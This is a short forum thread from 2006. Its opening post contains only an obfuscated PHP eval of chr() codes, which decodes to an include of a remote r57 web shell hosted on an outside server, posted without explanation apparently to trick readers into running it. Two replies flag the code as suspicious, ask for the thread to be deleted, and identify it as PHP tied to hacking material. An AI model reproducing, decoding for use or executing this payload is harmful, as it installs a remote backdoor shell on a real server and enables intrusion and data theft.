des123 Posted May 3, 2006 Share Posted May 3, 2006 eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); // Link to comment Share on other sites More sharing options...
Valik Posted May 3, 2006 Share Posted May 3, 2006 Somebody just delete this thread. While the code in Eval() isn't malicious, it's a URL that might be. Link to comment Share on other sites More sharing options...
Helge Posted May 3, 2006 Share Posted May 3, 2006 Somebody just delete this thread. While the code in Eval() isn't malicious, it's a URL that might be.Definitely.If you Google for "r57shell.php" you will find lots of links to stuffabout security and hacking. One of them is this link to Symantec.Makes me wonder why this is posted in the v2 forums, when the codeis obviously PHP ! Anyone who's smart enough to figure that it's PHP,would also be smart enough to not try it out without checking it out first !Nice try (not really) moron ! Link to comment Share on other sites More sharing options...
Recommended Posts